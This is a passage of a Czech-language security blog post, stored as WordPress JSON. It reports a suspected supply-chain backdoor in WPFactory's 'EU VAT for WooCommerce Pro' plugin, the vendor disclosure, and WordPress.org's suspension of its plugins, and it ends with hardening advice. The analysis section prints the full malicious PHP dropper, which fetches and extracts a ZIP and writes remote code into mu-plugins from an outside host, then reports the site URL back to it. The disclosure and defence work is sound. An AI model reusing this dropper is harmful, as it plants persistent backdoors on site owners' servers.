{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/cz\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"\u00danik dat u WPFactory: ohro\u017eeno 170 000 web\u016f na platform\u011b WordPress"},"content":{"rendered":"<p>WordPress z\u016fst\u00e1v\u00e1 nejpou\u017e\u00edvan\u011bj\u0161\u00edm syst\u00e9mem pro spr\u00e1vu obsahu na sv\u011bt\u011b, poh\u00e1n\u011bj\u00edc\u00edm v\u00edce ne\u017e 40 procent v\u0161ech webov\u00fdch str\u00e1nek na internetu. Od webov\u00fdch str\u00e1nek mal\u00fdch podnik\u016f a osobn\u00edch blog\u016f a\u017e po rozs\u00e1hl\u00e9 podnikov\u00e9 platformy a e-commerce infrastruktury se CMS stal p\u00e1te\u0159\u00ed modern\u00edho webu. Jeho popularita pramen\u00ed z jeho flexibility, otev\u0159en\u00e9ho ekosyst\u00e9mu a obrovsk\u00e9ho mno\u017estv\u00ed dostupn\u00fdch plugin\u016f pro roz\u0161\u00ed\u0159en\u00ed jeho funkcionality.<\/p>\n\n\n\n<p>Av\u0161ak pr\u00e1v\u011b tento ekosyst\u00e9m se stal tak\u00e9 jednou z nejv\u011bt\u0161\u00edch bezpe\u010dnostn\u00edch v\u00fdzev WordPressu.<\/p>\n\n\n\n<p>V Ferber Enterprises n\u00e1\u0161 t\u00fdm pro kyberbezpe\u010dnost neust\u00e1le sleduje hrozby, kter\u00e9 ohro\u017euj\u00ed ekosyst\u00e9m WordPressu, proto\u017ee zranitelnosti v pluginech, \u0161ablon\u00e1ch nebo dodavatelsk\u00fdch \u0159et\u011bzc\u00edch se mohou rychle prom\u011bnit v rozs\u00e1hl\u00e9 \u00fatoky postihuj\u00edc\u00ed tis\u00edce webov\u00fdch str\u00e1nek po cel\u00e9m sv\u011bt\u011b. V posledn\u00edch letech se \u00fato\u010dn\u00edci st\u00e1le \u010dast\u011bji zam\u011b\u0159uj\u00ed sp\u00ed\u0161e na v\u00fdvoj\u00e1\u0159e plugin\u016f a distribu\u010dn\u00ed infrastruktury ne\u017e na jednotliv\u00e9 webov\u00e9 str\u00e1nky, co\u017e umo\u017e\u0148uje \u0161\u00ed\u0159en\u00ed \u0161kodliv\u00e9ho k\u00f3du prost\u0159ednictv\u00edm d\u016fv\u011bryhodn\u00fdch aktualizac\u00ed softwaru a ofici\u00e1ln\u00edch kan\u00e1l\u016f pro stahov\u00e1n\u00ed.<\/p>\n\n\n\n<p>Tento t\u00fdden vypukla velk\u00e1 kauza kolem spole\u010dnosti WPFactory, zn\u00e1m\u00e9ho v\u00fdvoj\u00e1\u0159e plugin\u016f pro WordPress, jeho\u017e produkty jsou nainstalov\u00e1ny na v\u00edce ne\u017e 170 000 webov\u00fdch str\u00e1nk\u00e1ch po cel\u00e9m sv\u011bt\u011b. V\u00edce ne\u017e 80 plugin\u016f spojen\u00fdch s touto spole\u010dnost\u00ed bylo do\u010dasn\u011b zablokov\u00e1no na WordPress.org pot\u00e9, co n\u00e1\u0161 t\u00fdm pro kyberbezpe\u010dnost ve spole\u010dnosti WPFactory objevil podez\u0159en\u00ed na zadn\u00ed vr\u00e1tka v pr\u00e9miov\u00e9 verzi jednoho z jej\u00edch plugin\u016f.<\/p>\n\n\n\n<p>Tato ud\u00e1lost vyvolala v\u00e1\u017en\u00e9 obavy v cel\u00e9 komunit\u011b WordPressu ohledn\u011b bezpe\u010dnosti dodavatelsk\u00e9ho \u0159et\u011bzce softwaru, proces\u016f revize plugin\u016f a rostouc\u00ed sofistikovanosti \u00fatok\u016f zam\u011b\u0159en\u00fdch na ekosyst\u00e9m open source.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Objeven\u00ed podez\u0159el\u00e9ho chov\u00e1n\u00ed pluginu<\/h2>\n\n\n\n<p>Na tento probl\u00e9m jsme poprv\u00e9 narazili pot\u00e9, co n\u00e1\u0161 t\u00fdm pro kyberbezpe\u010dnost ve spole\u010dnosti Ferber Enterprises zaznamenal p\u0159i testov\u00e1n\u00ed pr\u00e9miov\u00e9 verze pluginu \u201eEU VAT for WooCommerce Pro\u201c, kter\u00fd je k dispozici p\u0159\u00edmo na ofici\u00e1ln\u00edch str\u00e1nk\u00e1ch, neobvykl\u00e9 chov\u00e1n\u00ed.<\/p>\n\n\n\n<p>P\u016fvodn\u011b vy\u0161et\u0159ov\u00e1n\u00ed za\u010dalo pot\u00e9, co plugin b\u011bhem instalace vygeneroval fat\u00e1ln\u00ed chybu. P\u0159i \u0159e\u0161en\u00ed probl\u00e9mu na\u0161i analytici identifikovali podez\u0159el\u00fd PHP soubor s n\u00e1zvem class-alg-wc-eu-vat-customer.php. Soubor vykazoval chov\u00e1n\u00ed zcela nekonzistentn\u00ed s o\u010dek\u00e1vanou funkcionalitou WooCommerce VAT pluginu.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Podle na\u0161\u00ed anal\u00fdzy se k\u00f3d pokusil o:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>St\u00e1hn\u011bte extern\u00ed ZIP archiv ze vzd\u00e1len\u00e9ho serveru<\/li>\n\n\n\n<li>Upravit adres\u00e1\u0159e j\u00e1dra WordPressu<\/li>\n\n\n\n<li>Komunikovat s extern\u00ed infrastrukturou<\/li>\n\n\n\n<li>Potenci\u00e1ln\u011b spustit vzd\u00e1len\u00e9 programy na napaden\u00fdch webov\u00fdch str\u00e1nk\u00e1ch<\/li>\n<\/ul>\n\n\n\n<p>Tyto ukazatele okam\u017eit\u011b nazna\u010dovaly mo\u017enou p\u0159\u00edtomnost skryt\u00fdch zadn\u00edch vr\u00e1tek nebo kompromitace dodavatelsk\u00e9ho \u0159et\u011bzce.<\/p>\n\n\n\n<p>Situaci \u010dinilo obzvl\u00e1\u0161t\u011b znepokojivou to, \u017ee plugin nebyl sta\u017een z neofici\u00e1ln\u00edho zrcadla ani z pir\u00e1tsk\u00e9ho repozit\u00e1\u0159e. Bal\u00ed\u010dek byl sta\u017een p\u0159\u00edmo z ofici\u00e1ln\u00edho z\u00e1kaznick\u00e9ho port\u00e1lu spole\u010dnosti WPFactory, co\u017e je\u0161t\u011b v\u00edce pos\u00edlilo obavy, \u017ee samotn\u00fd distribu\u010dn\u00ed kan\u00e1l mohl b\u00fdt napaden.<\/p>\n\n\n\n<p>Ve spole\u010dnosti Ferber Enterprises jsme incident okam\u017eit\u011b zdokumentovali a zah\u00e1jili proces odpov\u011bdn\u00e9ho ozn\u00e1men\u00ed t\u00edm, \u017ee jsme spole\u010dnost WPFactory kontaktovali p\u0159\u00edmo p\u0159es GitHub.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Prvn\u00ed reakce od WPFactory<\/h2><\/div>\n\n\n\n<p>Spole\u010dnost WPFactory zpo\u010d\u00e1tku reagovala prohl\u00e1\u0161en\u00edm, \u017ee podez\u0159el\u00fd soubor a chov\u00e1n\u00ed popsan\u00e9 v hl\u00e1\u0161en\u00ed nejsou sou\u010d\u00e1st\u00ed jejich ofici\u00e1ln\u00edho zdrojov\u00e9ho k\u00f3du.<\/p>\n\n\n\n<p>Z\u00e1stupce spole\u010dnosti navrhl n\u011bkolik alternativn\u00edch vysv\u011btlen\u00ed, v\u010detn\u011b:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Upraven\u00e1 lok\u00e1ln\u00ed instalace<\/li>\n\n\n\n<li>Ohro\u017een\u00e9 prost\u0159ed\u00ed webov\u00fdch str\u00e1nek<\/li>\n\n\n\n<li>Zastaral\u00e1 verze z\u00e1suvn\u00e9ho modulu<\/li>\n\n\n\n<li>Potenci\u00e1ln\u011b pozm\u011bn\u011bn\u00fd zdroj stahov\u00e1n\u00ed<\/li>\n<\/ul>\n\n\n\n<p>Spole\u010dnost d\u00e1le uvedla, \u017ee nebyla schopna bezpe\u010dn\u011b zkontrolovat poskytnut\u00fd ZIP soubor, proto\u017ee jejich prohl\u00ed\u017ee\u010d ozna\u010dil archiv jako potenci\u00e1ln\u011b nebezpe\u010dn\u00fd.<\/p>\n\n\n\n<p>N\u00e1\u0161 t\u00fdm pro kyberbezpe\u010dnost n\u00e1sledn\u011b objasnil, \u017ee plugin byl sta\u017een p\u0159\u00edmo z ofici\u00e1ln\u00edch str\u00e1nek WPFactory a \u017ee podez\u0159el\u00fd soubor z\u016fstal v syst\u00e9mu i po sta\u017een\u00ed nov\u00e9 kopie verze 4.6.1 ze stejn\u00e9ho zdroje.<\/p>\n\n\n\n<p>Tento detail se stal kl\u00ed\u010dov\u00fdm bodem vy\u0161et\u0159ov\u00e1n\u00ed. Pokud n\u011bkolik nez\u00e1visl\u00fdch sta\u017een\u00ed z ofici\u00e1ln\u00edho distribu\u010dn\u00edho kan\u00e1lu soustavn\u011b obsahovalo stejn\u00fd podez\u0159el\u00fd k\u00f3d, mo\u017enost napaden\u00ed lok\u00e1ln\u00ed webov\u00e9 str\u00e1nky se jevila jako st\u00e1le m\u00e9n\u011b pravd\u011bpodobn\u00e1. Navzdory t\u011bmto zji\u0161t\u011bn\u00edm spole\u010dnost WPFactory zpo\u010d\u00e1tku uvedla, \u017ee se j\u00ed nepoda\u0159ilo tento probl\u00e9m na sv\u00e9 stran\u011b reprodukovat, a tvrdila, \u017ee podez\u0159el\u00fd soubor v ofici\u00e1ln\u00edm bal\u00ed\u010dku pluginu neexistuje.<\/p>\n\n\n\n<p>Spole\u010dnost n\u00e1sledn\u011b po\u017e\u00e1dala o spr\u00e1vcovsk\u00fd p\u0159\u00edstup a p\u0159\u00edstup p\u0159es FTP k dot\u010den\u00e9mu prost\u0159ed\u00ed, aby mohla ve vy\u0161et\u0159ov\u00e1n\u00ed pokra\u010dovat. Ve spole\u010dnosti Ferber Enterprises jsme tuto \u017e\u00e1dost z d\u016fvod\u016f kyberbezpe\u010dnosti zam\u00edtli. Poskytnut\u00ed privilegovan\u00e9ho p\u0159\u00edstupu k serveru dodavateli, jeho\u017e infrastruktura mohla b\u00fdt sama o sob\u011b napadena, by p\u0159edstavovalo nep\u0159ijateln\u00e9 bezpe\u010dnostn\u00ed riziko. N\u00e1\u0161 t\u00fdm m\u00edsto toho pokra\u010doval v p\u0159edkl\u00e1d\u00e1n\u00ed technick\u00fdch d\u016fkaz\u016f, v\u010detn\u011b videonahr\u00e1vky, kter\u00e1 zachycovala podez\u0159el\u00e9 chov\u00e1n\u00ed pluginu bezprost\u0159edn\u011b po jeho instalaci.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Eskalace na WordPress.org<\/h2><\/div>\n\n\n\n<p>S postupuj\u00edc\u00edm vy\u0161et\u0159ov\u00e1n\u00edm nar\u016fstaly obavy ohledn\u011b mo\u017en\u00e9ho rozsahu probl\u00e9mu. Spole\u010dnost WPFactory spravuje rozs\u00e1hl\u00e9 portfolio plugin\u016f, kter\u00e9 zahrnuje v\u00edce ne\u017e 65 plugin\u016f s celkov\u00fdm po\u010dtem p\u0159es 170 000 aktivn\u00edch instalac\u00ed. Jak\u00fdkoli \u00fatok na distribu\u010dn\u00ed infrastrukturu spole\u010dnosti by proto mohl m\u00edt dalekos\u00e1hl\u00e9 d\u016fsledky pro cel\u00fd ekosyst\u00e9m WordPressu.<\/p>\n\n\n\n<p>N\u00e1\u0161 t\u00fdm p\u0159edal tento probl\u00e9m p\u0159\u00edmo t\u00fdmu WordPress.org, aby zabr\u00e1nil dal\u0161\u00edm u\u017eivatel\u016fm v instalaci potenci\u00e1ln\u011b napaden\u00fdch bal\u00ed\u010dk\u016f, dokud vy\u0161et\u0159ov\u00e1n\u00ed prob\u00edhalo. WordPress.org n\u00e1sledn\u011b p\u0159ijal mimo\u0159\u00e1dn\u00e9 opat\u0159en\u00ed a do\u010dasn\u011b z ofici\u00e1ln\u00edho repozit\u00e1\u0159e odstranil v\u00edce ne\u017e 80 plugin\u016f WPFactory.<\/p>\n\n\n\n<p>Tento krok okam\u017eit\u011b vzbudil pozornost cel\u00e9 bezpe\u010dnostn\u00ed komunity WordPressu, proto\u017ee hromadn\u00e9 pozastaven\u00ed plugin\u016f v takov\u00e9mto rozsahu je pom\u011brn\u011b vz\u00e1cn\u00e9 a obvykle signalizuje z\u00e1va\u017en\u00e9 nevy\u0159e\u0161en\u00e9 probl\u00e9my. Pot\u00e9, co se z\u00e1le\u017eitost dostala do \u0161ir\u0161\u00edho pov\u011bdom\u00ed, spole\u010dnost WPFactory pozd\u011bji uznala, \u017ee se probl\u00e9m jevil jako opr\u00e1vn\u011bn\u00fd, a omluvila se za to, \u017ee na p\u016fvodn\u00ed hl\u00e1\u0161en\u00ed nezareagovala rychleji. Z\u00e1stupci spole\u010dnosti uvedli, \u017ee z\u00e1le\u017eitost aktivn\u011b vy\u0161et\u0159uj\u00ed a pracuj\u00ed na jej\u00edm vy\u0159e\u0161en\u00ed. Jedna z hypot\u00e9z, kterou intern\u011b vznesla spole\u010dnost WPFactory, nazna\u010dovala, \u017ee prost\u0159ednictv\u00edm jejich infrastruktury mohl b\u00fdt ne\u00famysln\u011b poskytnut zastaral\u00fd nebo ulo\u017een\u00fd v mezipam\u011bti bal\u00ed\u010dek plugin\u016f.<\/p>\n\n\n\n<p>Nicm\u00e9n\u011b n\u00e1\u0161 t\u00fdm pro kybernetickou bezpe\u010dnost s t\u00edmto hodnocen\u00edm nesouhlasil. Pozorovan\u00e9 chov\u00e1n\u00ed siln\u011b nazna\u010dovalo hlub\u0161\u00ed bezpe\u010dnostn\u00ed probl\u00e9m, kter\u00fd mohl zahrnovat kompromitovan\u00e9 buildovac\u00ed pipeline, distribu\u010dn\u00ed syst\u00e9my nebo neautorizovan\u00e9 vkl\u00e1d\u00e1n\u00ed k\u00f3du do archiv\u016f stahovateln\u00fdch plugin\u016f.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Pro\u010d se tento incident stal d\u016fle\u017eit\u00fdm<\/h2>\n\n\n\n<p>Kontroverze kolem WPFactory poukazuje na rostouc\u00ed hrozbu v oblasti kyberbezpe\u010dnosti, zn\u00e1mou jako \u00fatok na softwarov\u00fd dodavatelsk\u00fd \u0159et\u011bzec. \u00dato\u010dn\u00edci se d\u0159\u00edve soust\u0159edili na napad\u00e1n\u00ed jednotliv\u00fdch webov\u00fdch str\u00e1nek p\u0159\u00edmo prost\u0159ednictv\u00edm \u00fatok\u016f hrubou silou nebo zneu\u017eit\u00edm zranitelnost\u00ed plugin\u016f. Dnes se \u00fato\u010dn\u00edci st\u00e1le \u010dast\u011bji zam\u011b\u0159uj\u00ed p\u0159\u00edmo na samotn\u00e9 dodavatele softwaru, proto\u017ee napaden\u00ed d\u016fv\u011bryhodn\u00e9ho dodavatele umo\u017e\u0148uje \u0161\u00ed\u0159en\u00ed \u0161kodliv\u00e9ho k\u00f3du na tis\u00edce webov\u00fdch str\u00e1nek najednou.<\/p>\n\n\n\n<p>Tato strategie ji\u017e byla pozorov\u00e1na v n\u011bkolika v\u00fdznamn\u00fdch kybernetick\u00fdch incidentech ovliv\u0148uj\u00edc\u00edch glob\u00e1ln\u00ed softwarov\u00e9 ekosyst\u00e9my v posledn\u00edm desetilet\u00ed. Konkr\u00e9tn\u011b v ekosyst\u00e9mu WordPress p\u0159edstavuj\u00ed v\u00fdvoj\u00e1\u0159i plugin\u016f atraktivn\u00ed c\u00edle, proto\u017ee pluginy jsou administr\u00e1tory inherentn\u011b d\u016fv\u011bryhodn\u00e9 a \u010dasto pracuj\u00ed s roz\u0161\u00ed\u0159en\u00fdmi opr\u00e1vn\u011bn\u00edmi.<\/p>\n\n\n\n<p>Pokud se do bal\u00ed\u010dku pluginu distribuovan\u00e9ho prost\u0159ednictv\u00edm ofici\u00e1ln\u00edho kan\u00e1lu dostane \u0161kodliv\u00fd k\u00f3d, mohou si posti\u017een\u00e9 webov\u00e9 str\u00e1nky nev\u011bdomky nainstalovat malware. V p\u0159\u00edpad\u011b podez\u0159el\u00e9ho pluginu WPFactory jsou mo\u017en\u00e9 d\u016fsledky z\u00e1va\u017en\u00e9.<\/p>\n\n\n\n<p>Na z\u00e1klad\u011b na\u0161\u00ed anal\u00fdzy by identifikovan\u00e9 chov\u00e1n\u00ed teoreticky umo\u017enilo \u00fato\u010dn\u00edk\u016fm:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nasa\u010fte dal\u0161\u00ed malware<\/li>\n\n\n\n<li>Vlo\u017eit SEO spam<\/li>\n\n\n\n<li>Vytvo\u0159it trval\u00e9 zadn\u00ed vr\u00e1tka<\/li>\n\n\n\n<li>Exfiltrovat citliv\u00e1 data<\/li>\n\n\n\n<li>Spravovat instalace WordPressu na d\u00e1lku<\/li>\n\n\n\n<li>Udr\u017eovat neopr\u00e1vn\u011bn\u00fd p\u0159\u00edstup po del\u0161\u00ed dobu<\/li>\n<\/ul>\n\n\n\n<p>Nebezpe\u010d\u00ed takov\u00fdch \u00fatok\u016f spo\u010d\u00edv\u00e1 v jejich nen\u00e1padnosti. Modern\u00ed zadn\u00ed vr\u00e1tka jsou \u010dasto navr\u017eena tak, aby z\u016fstala ne\u010dinn\u00e1 cel\u00e9 m\u011bs\u00edce, ne\u017e se aktivuj\u00ed, co\u017e zt\u011b\u017euje jejich odhalen\u00ed. Za\u010d\u00e1tkem tohoto m\u011bs\u00edce \u00fadajn\u011b t\u00fdm WordPress Plugins uzav\u0159el v\u00edce ne\u017e 30 plugin\u016f pot\u00e9, co skryt\u00fd \u0161kodliv\u00fd k\u00f3d vlo\u017een\u00fd do portfolia jin\u00e9ho pluginu z\u016fstal p\u0159ibli\u017en\u011b osm m\u011bs\u00edc\u016f neaktivn\u00ed, ne\u017e se nakonec aktivoval a vlo\u017eil SEO spam na webov\u00e9 str\u00e1nky.<\/p>\n\n\n\n<p>Tento trend ukazuje, jak \u00fato\u010dn\u00edci st\u00e1le v\u00edce up\u0159ednost\u0148uj\u00ed perzistenci a odlo\u017eenou aktivaci k obejit\u00ed detek\u010dn\u00edch mechanism\u016f.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">\u0160ir\u0161\u00ed bezpe\u010dnostn\u00ed krize v ekosyst\u00e9mu WordPress<\/h2><\/div>\n\n\n\n<p>Incident WPFactory z\u00e1rove\u0148 poukazuje na \u0161ir\u0161\u00ed syst\u00e9mov\u00e9 bezpe\u010dnostn\u00ed probl\u00e9my, kter\u00e9 se dot\u00fdkaj\u00ed cel\u00e9ho prost\u0159ed\u00ed WordPressu. Ekosyst\u00e9m plugin\u016f se za posledn\u00ed desetilet\u00ed dramaticky rozrostl a na ofici\u00e1ln\u00edch i komer\u010dn\u00edch tr\u017ei\u0161t\u00edch jsou k dispozici des\u00edtky tis\u00edc plugin\u016f. A\u010dkoli tento ekosyst\u00e9m podporuje inovace a flexibilitu, z\u00e1rove\u0148 zna\u010dn\u011b komplikuje dohled nad bezpe\u010dnost\u00ed.<\/p>\n\n\n\n<p>Podle zpr\u00e1vy spole\u010dnosti Patchstack s n\u00e1zvem \u201cStav zabezpe\u010den\u00ed WordPressu v roce 2026\u201d nebylo t\u00e9m\u011b\u0159 461 000 zn\u00e1m\u00fdch zranitelnost\u00ed opraveno je\u0161t\u011b p\u0159ed jejich zve\u0159ejn\u011bn\u00edm. Tento \u00fadaj odr\u00e1\u017e\u00ed rostouc\u00ed z\u00e1t\u011b\u017e, kter\u00e9 \u010del\u00ed v\u00fdvoj\u00e1\u0159i plugin\u016f, bezpe\u010dnostn\u00ed v\u00fdzkumn\u00edci i spr\u00e1vci repozit\u00e1\u0159\u016f.<\/p>\n\n\n\n<p>Ve stejnou dobu ofici\u00e1ln\u00ed fronta pro recenze plugin\u016f WordPress pr\u00fd nyn\u00ed p\u0159esahuje 4 000 plugin\u016f \u010dekaj\u00edc\u00edch na revizi. Tato \u010d\u00edsla ilustruj\u00ed obrovskou v\u00fdzvu p\u0159i zaji\u0161\u0165ov\u00e1n\u00ed kvality a bezpe\u010dnostn\u00edch audit\u016f ve velk\u00e9m m\u011b\u0159\u00edtku.<\/p>\n\n\n\n<p>Mnoz\u00ed v\u00fdvoj\u00e1\u0159i plugin\u016f jsou mal\u00e9 t\u00fdmy s omezen\u00fdmi zdroji v oblasti bezpe\u010dnosti. Jin\u00ed spravuj\u00ed des\u00edtky plugin\u016f najednou a z\u00e1rove\u0148 prosazuj\u00ed agresivn\u00ed strategie obchodn\u00edho r\u016fstu zahrnuj\u00edc\u00ed akvizice a roz\u0161i\u0159ov\u00e1n\u00ed portfolia. Samotn\u00e1 spole\u010dnost WPFactory se ned\u00e1vno rozrostla prost\u0159ednictv\u00edm akvizic, v\u010detn\u011b koup\u011b spole\u010dnosti Extend-WP a jej\u00edch 19 plugin\u016f v roce 2025, na kterou pozd\u011bji t\u00e9ho\u017e roku nav\u00e1zala akvizice spole\u010dnosti WBW a n\u011bkolika dal\u0161\u00edch plugin\u016f.<\/p>\n\n\n\n<p>Rychl\u00e9 roz\u0161i\u0159ov\u00e1n\u00ed portfolia m\u016f\u017ee vytv\u00e1\u0159et provozn\u00ed slo\u017eitost, kter\u00e1 zt\u011b\u017euje auditov\u00e1n\u00ed k\u00f3du, spr\u00e1vu infrastruktury a ov\u011b\u0159ov\u00e1n\u00ed integrity vyd\u00e1n\u00ed. \u00dato\u010dn\u00edci si jsou t\u011bchto skute\u010dnost\u00ed dob\u0159e v\u011bdomi. St\u00e1le \u010dast\u011bji se zam\u011b\u0159uj\u00ed na zneu\u017eit\u00ed slab\u00fdch provozn\u00edch bezpe\u010dnostn\u00edch praktik v r\u00e1mci dodavatel\u016f softwaru, m\u00edsto aby c\u00edlili p\u0159\u00edmo na koncov\u00e9 u\u017eivatele.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Rostouc\u00ed v\u00fdznam zabezpe\u010den\u00ed dodavatelsk\u00e9ho \u0159et\u011bzce<\/h2>\n\n\n\n<p>Incidenty tohoto typu posiluj\u00ed nal\u00e9havou pot\u0159ebu siln\u011bj\u0161\u00edch postup\u016f zabezpe\u010den\u00ed dodavatelsk\u00e9ho \u0159et\u011bzce v cel\u00e9m ekosyst\u00e9mu WordPressu.<\/p>\n\n\n\n<p>T\u00fdm pro kyberbezpe\u010dnost spole\u010dnosti Ferber Enterprises d\u016frazn\u011b doporu\u010duje, aby v\u00fdvoj\u00e1\u0159i plugin\u016f zavedli n\u011bkolik kl\u00ed\u010dov\u00fdch bezpe\u010dnostn\u00edch opat\u0159en\u00ed, mezi n\u011b\u017e pat\u0159\u00ed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Podepisov\u00e1n\u00ed kryptografick\u00fdch bal\u00ed\u010dk\u016f<\/li>\n\n\n\n<li>Zabezpe\u010den\u00e9 kan\u00e1ly CI\/CD<\/li>\n\n\n\n<li>Povinn\u00e9 v\u00edcefaktorov\u00e9 ov\u011b\u0159ov\u00e1n\u00ed<\/li>\n\n\n\n<li>Segmentace infrastruktury<\/li>\n\n\n\n<li>Nep\u0159etr\u017eit\u00e9 monitorov\u00e1n\u00ed integrity<\/li>\n\n\n\n<li>Nez\u00e1visl\u00e9 bezpe\u010dnostn\u00ed audity k\u00f3du<\/li>\n\n\n\n<li>Reprodukovateln\u00e9 buildovac\u00ed syst\u00e9my<\/li>\n<\/ul>\n\n\n\n<p>Spr\u00e1vci webu by m\u011bli tak\u00e9 posilovat svou vlastn\u00ed bezpe\u010dnost. Ani pluginy sta\u017een\u00e9 z ofici\u00e1ln\u00edch nebo d\u016fv\u011bryhodn\u00fdch zdroj\u016f nelze automaticky pova\u017eovat za bezpe\u010dn\u00e9.<\/p>\n\n\n\n<p>Organizace spravuj\u00edc\u00ed kritickou infrastrukturu WordPress by m\u011bly zv\u00e1\u017eit:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Spr\u00e1va staging prost\u0159ed\u00ed<\/li>\n\n\n\n<li>Monitorov\u00e1n\u00ed odchoz\u00edho provozu<\/li>\n\n\n\n<li>Skenov\u00e1n\u00ed plugin\u016f p\u0159ed nasazen\u00edm<\/li>\n\n\n\n<li>Omezen\u00ed pou\u017e\u00edv\u00e1n\u00ed plugin\u016f<\/li>\n\n\n\n<li>Aplikace kontroly p\u0159\u00edstupu s nejni\u017e\u0161\u00edmi opr\u00e1vn\u011bn\u00edmi<\/li>\n\n\n\n<li>Implementace monitorov\u00e1n\u00ed integrity soubor\u016f<\/li>\n\n\n\n<li>Pou\u017e\u00edv\u00e1n\u00ed spravovan\u00fdch webov\u00fdch aplika\u010dn\u00edch firewall\u016f (WAF)<\/li>\n<\/ul>\n\n\n\n<p>V podnikov\u00fdch prost\u0159ed\u00edch se validace dodavatelsk\u00e9ho \u0159et\u011bzce st\u00e1v\u00e1 stejn\u011b d\u016fle\u017eitou jako tradi\u010dn\u00ed \u0159\u00edzen\u00ed zranitelnost\u00ed. P\u0159edpoklad, \u017ee ofici\u00e1ln\u00ed softwarov\u00e9 kan\u00e1ly jsou v\u017edy bezpe\u010dn\u00e9, ji\u017e nen\u00ed v dne\u0161n\u00edm prost\u0159ed\u00ed hrozeb realistick\u00fd.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reakce komunity a prob\u00edhaj\u00edc\u00ed vy\u0161et\u0159ov\u00e1n\u00ed<\/h2>\n\n\n\n<p>Kontroverze se rychle roz\u0161\u00ed\u0159ila komunitou WordPressu pot\u00e9, co o probl\u00e9mu za\u010dali ve\u0159ejn\u011b diskutovat v\u00fdvoj\u00e1\u0159i, bezpe\u010dnostn\u00ed v\u00fdzkumn\u00edci a poskytovatel\u00e9 infrastruktury.<\/p>\n\n\n\n<p>N\u011bkolik zn\u00e1m\u00fdch osobnost\u00ed z ekosyst\u00e9mu roz\u0161\u00ed\u0159ilo pov\u011bdom\u00ed o situaci, v\u010detn\u011b v\u00fdvoj\u00e1\u0159\u016f, kte\u0159\u00ed zve\u0159ejnili seznamy do\u010dasn\u011b uzav\u0159en\u00fdch plugin\u016f a vyzvali administr\u00e1tory k auditu jejich 